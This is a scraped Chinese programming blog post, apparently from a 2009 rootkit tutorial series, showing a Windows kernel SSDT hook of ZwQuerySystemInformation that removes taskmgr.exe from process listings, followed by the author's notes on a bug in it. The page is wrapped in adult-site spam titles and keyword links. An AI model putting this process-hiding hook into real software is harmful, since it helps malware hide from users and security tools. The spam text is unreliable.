青青草原综合久久大伊人导航_色综合久久天天综合_日日噜噜夜夜狠狠久久丁香五月_热久久这里只有精品

S.l.e!ep.¢%

像打了激速一樣,以四倍的速度運(yùn)轉(zhuǎn),開心的工作
簡單、開放、平等的公司文化;尊重個性、自由與個人價值;
posts - 1098, comments - 335, trackbacks - 0, articles - 1
  C++博客 :: 首頁 :: 新隨筆 :: 聯(lián)系 :: 聚合  :: 管理

HOOK SSDT Hide Process (七)

Posted on 2009-10-27 17:32 S.l.e!ep.¢% 閱讀(333) 評論(0)  編輯 收藏 引用 所屬分類: RootKit

[資料] http://m.shnenglu.com/sleepwom/archive/2009/10/24/99375.html

HOOK SSDT Hide Process (六)??

下面這個函數(shù)有問題,運(yùn)行之后,Taskmgr.exe 里面的進(jìn)程列表估然顯示為空
NTSTATUS?MyZwQuerySystemInformation(IN?ULONG?SystemInformationClass,?
????????????????????????????????????IN?PVOID?SystemInformation,?
????????????????????????????????????IN?ULONG?SystemInformationLength,?
????????????????????????????????????OUT?PULONG?ReturnLength)?
// 定義自己的Hook函數(shù)
{?
????
????NTSTATUS?rc;?
????UNICODE_STRING?process_name;
????
????RtlInitUnicodeString(
& process_name,?L " taskmgr.exe " );
????
????rc?
= ?(OldZwQuerySystemInformation)?(?
????????SystemInformationClass,?
????????SystemInformation,?
????????SystemInformationLength,?
????????ReturnLength);?
????
????
if (NT_SUCCESS(rc))?
????{
????????
????????
if ( 5 ? == ?SystemInformationClass)
????????{?
????????????
????????????
struct ?_SYSTEM_PROCESSES? * curr? = ?( struct ?_SYSTEM_PROCESSES? * )SystemInformation;?
????????????
struct ?_SYSTEM_PROCESSES? * prev? = ?NULL;?
????????????
????????????
if (curr -> NextEntryDelta)
????????????????curr?
= ?(_SYSTEM_PROCESSES? * )((ULONG)curr? + ?curr -> NextEntryDelta);?
????????????
????????????
while (curr)
????????????{
????????????????
if ?(RtlEqualUnicodeString( & process_name,? & curr -> ProcessName,? 1 ))
????????????????{
????????????????????KdPrint((
" hide?process'name?taskmgr.exe " ));
????????????????????
????????????????????
if (prev)?
????????????????????{?
????????????????????????
if (curr -> NextEntryDelta)
????????????????????????{
????????????????????????????prev
-> NextEntryDelta? += ?curr -> NextEntryDelta;
????????????????????????}?
????????????????????????
else
????????????????????????{
????????????????????????????prev
-> NextEntryDelta? = ? 0 ;
????????????????????????}
????????????????????}
????????????????????
else
????????????????????{
????????????????????????
if (curr -> NextEntryDelta)
????????????????????????{
????????????????????????????SystemInformation?
= (PVOID)((ULONG)SystemInformation? + ?curr -> NextEntryDelta);
????????????????????????}
????????????????????????
else
????????????????????????{
????????????????????????????SystemInformation?
= ?NULL;
????????????????????????}
????????????????????}
????????????????????
????????????????????
if (curr -> NextEntryDelta)
????????????????????????curr?
= ?(_SYSTEM_PROCESSES? * )((ULONG)curr? + ?curr -> NextEntryDelta);
????????????????????
else
????????????????????{
????????????????????????curr?
= ?NULL;
????????????????????????
break ;
????????????????????}
????????????????????
????????????????}?
// ?if?(RtlEqualUnicodeString(&process_name,?&curr->ProcessName,?1))
????????????????
????????????????
if (curr? != ?NULL)
????????????????{
????????????????????prev?
= ?curr;
????????????????????
????????????????????
if (curr -> NextEntryDelta)
????????????????????????curr?
= ?(_SYSTEM_PROCESSES? * )((ULONG)curr? + ?curr -> NextEntryDelta);
????????????????????
else
????????????????????????curr?
= ?NULL;
????????????????????
????????????????}
// ?if(curr?!=?NULL)
????????????????
????????????}
// ?while(curr)?
????????????
????????}
// ?if(5?==?SystemInformationClass)
????????
????}
// ?if(NT_SUCCESS(rc))
????
????
// ?KdPrint(("HookZwQuerySystemInformation?is?Succeessfully.?\n"));
???? return ?rc;
}

使用自己的查詢進(jìn)程EXE(HOOK SSDT Hide Process (五) ),顯示結(jié)果是正常的

驅(qū)動中判斷的是 taskmgr.exe?,在遍歷時,taskmgr.exe 剛好在最好一個,把 NextEntryDelta 設(shè)置為 0 了
如果是其它的 abc.exe ,然后再打開 taskmgr.exe 是沒問題的

看來,HOOK SSDT Hide Process (五) 遍歷進(jìn)程的實(shí)現(xiàn) 跟 Taskmgr.exe 的實(shí)現(xiàn)有差異, 需要再找時間看下原因

MyZwQuerySystemInformation() 的實(shí)現(xiàn)來看,只是簡單地修改了下 NextEntryDelta ,并非真正意義上的'隱藏'
還是會把數(shù)據(jù)傳給用戶態(tài)。
青青草原综合久久大伊人导航_色综合久久天天综合_日日噜噜夜夜狠狠久久丁香五月_热久久这里只有精品
  • <ins id="pjuwb"></ins>
    <blockquote id="pjuwb"><pre id="pjuwb"></pre></blockquote>
    <noscript id="pjuwb"></noscript>
          <sup id="pjuwb"><pre id="pjuwb"></pre></sup>
            <dd id="pjuwb"></dd>
            <abbr id="pjuwb"></abbr>
            亚洲自拍偷拍福利| 一区二区三区精品在线| 国产欧美 在线欧美| 亚洲一区二区三区高清 | 久久国产主播| 亚洲欧美成aⅴ人在线观看| 久久激情综合| 一本色道久久综合亚洲二区三区| 国产精品视频免费在线观看| 欧美福利视频一区| 猛男gaygay欧美视频| 黄色成人91| 国内成+人亚洲+欧美+综合在线| 国产精品一区二区三区四区| 老色批av在线精品| 亚洲夜晚福利在线观看| 亚洲国产专区校园欧美| 亚洲综合99| 欧美日韩免费视频| 欧美在线观看一区二区三区| 欧美在线观看网站| 欧美高清视频一区二区三区在线观看| 麻豆成人综合网| 国产精品国内视频| 亚洲激情校园春色| 午夜亚洲视频| 日韩午夜在线| 午夜在线观看欧美| 亚洲国产精品成人综合色在线婷婷| 亚洲电影一级黄| 欧美在线一级视频| 国产精品久久夜| 99视频精品| 欧美激情精品久久久久久大尺度| 亚洲美女黄网| 欧美日韩成人在线视频| 亚洲午夜一区二区| 欧美激情在线| 日韩视频―中文字幕| 久久久久看片| 久久久亚洲精品一区二区三区 | 欧美成人午夜激情视频| 亚洲国产精品精华液2区45| 欧美在线3区| 欧美一级大片在线免费观看| 国产精品第三页| 亚洲深夜福利在线| 亚洲一区影音先锋| 亚洲天堂免费观看| 欧美—级a级欧美特级ar全黄| 9i看片成人免费高清| 国产农村妇女毛片精品久久莱园子| 亚洲国产精品久久久久秋霞蜜臀 | 中文亚洲字幕| 免费观看亚洲视频大全| 裸体丰满少妇做受久久99精品| 国产精品久久久久久久久| 先锋资源久久| 久久高清国产| 亚洲一区三区在线观看| 久久国产精彩视频| 亚洲午夜精品网| 欧美大片在线观看一区| 欧美在线国产精品| 女人香蕉久久**毛片精品| 亚洲线精品一区二区三区八戒| 99精品国产一区二区青青牛奶| 欧美高清视频免费观看| 国产一区二区在线免费观看| 亚洲激情视频在线播放| 国产在线高清精品| 亚洲欧美日韩精品久久奇米色影视| 亚洲欧洲日韩女同| 久久亚洲春色中文字幕| 久久精品国产亚洲a| 国产欧美精品一区| 亚洲欧洲日本国产| 国产精品揄拍500视频| 午夜精品福利一区二区蜜股av| 亚洲视频在线一区| 欧美午夜一区二区福利视频| 日韩亚洲视频| 欧美一区二区三区婷婷月色 | 久久精品国产亚洲一区二区三区| 亚洲在线免费视频| 一区二区三欧美| 亚洲四色影视在线观看| 欧美在线视屏| 欧美黄色大片网站| 亚洲深夜福利网站| 欧美成人精品福利| 亚洲一区欧美激情| 国产精品自拍视频| 欧美承认网站| 国产综合久久| 午夜久久黄色| 亚洲一二区在线| 久热爱精品视频线路一| 在线视频亚洲| 国产欧美日韩精品在线| 久久精品官网| 男女精品视频| 欧美一区二区三区日韩| 亚洲欧洲另类| 欧美成人在线网站| 欧美呦呦网站| 亚洲另类在线一区| 欧美激情一区在线| 亚洲欧洲三级| 在线视频欧美日韩| 亚洲国产精品综合| 另类尿喷潮videofree| 亚洲日本激情| 欧美mv日韩mv国产网站| 一区二区三区四区五区视频| 欧美高清视频一区二区| 久久中文字幕一区二区三区| 久久九九热re6这里有精品| 久久精品欧洲| 欧美aa国产视频| 亚洲国语精品自产拍在线观看| 欧美高清hd18日本| 亚洲激情欧美激情| 在线亚洲一区二区| 久久国产精品毛片| 欧美成人精品福利| 欧美日韩视频| 亚洲精品1区| 国产亚洲视频在线观看| 欧美在线观看一区| 香蕉久久夜色| 欧美尤物巨大精品爽| 亚洲欧洲日产国产网站| 国产视频在线观看一区| 久久久91精品国产一区二区三区| 欧美精品一区二区三区视频| 亚洲线精品一区二区三区八戒| 一区二区免费在线播放| 亚洲手机视频| 久久亚洲午夜电影| 国产精品ⅴa在线观看h| 亚洲毛片在线看| 免费欧美电影| 午夜精品福利一区二区三区av| 国产婷婷一区二区| 欧美大色视频| 日韩午夜电影在线观看| 国产日韩一区欧美| 欧美日韩一区二区三区高清| 欧美日韩国产首页在线观看| 国产一级揄自揄精品视频| 激情久久综合| 亚洲在线一区二区| 亚洲国产综合在线| 欧美.日韩.国产.一区.二区| 国产午夜精品久久久| 亚洲香蕉在线观看| 亚洲天堂男人| 国产精品视频久久久| 欧美在线视频免费播放| 亚洲欧美不卡| 伊人久久大香线蕉av超碰演员| 欧美在线免费观看| 老司机精品久久| 亚洲欧美在线免费观看| 亚洲日本电影| 一区二区三区视频在线| 国产精品亚洲片夜色在线| 欧美一区二区在线视频| 久久蜜桃香蕉精品一区二区三区| 亚洲第一在线综合网站| 免费日韩精品中文字幕视频在线| 久久成人免费| 亚洲国产成人在线播放| 亚洲电影免费观看高清| 欧美日韩中国免费专区在线看| 亚洲欧美日本视频在线观看| 欧美一区二区三区视频在线 | 国产乱理伦片在线观看夜一区| 欧美在线视频二区| 激情久久中文字幕| 久久精品九九| 欧美成人蜜桃| 久久国产天堂福利天堂| 欧美成人四级电影| 久久九九国产精品| 国产精品国产三级国产专播品爱网| 欧美有码视频| 久久久国产精品亚洲一区 | 久久成人免费电影| 欧美影片第一页| 欧美中文在线观看| 亚洲欧美综合v| 欧美视频精品一区| 一区二区毛片| 亚洲欧美视频在线观看视频| 欧美大片在线观看一区二区| 亚洲电影天堂av| 99精品国产99久久久久久福利| 欧美高清在线播放|